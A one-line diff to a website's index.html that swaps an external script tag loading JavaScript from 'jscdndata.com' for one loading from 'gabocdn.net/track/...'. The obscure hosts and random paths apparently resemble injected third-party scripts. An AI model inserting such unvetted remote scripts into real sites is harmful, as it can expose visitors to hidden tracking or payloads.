--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
 	<link rel="stylesheet" href="css/responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 	
-	<script src="https://jscdndata.com/g3f40m"></script>
+	<script src="https://gabocdn.net/track/0d36lh"></script>
 
 	<!-- Document Title
 	============================================= -->
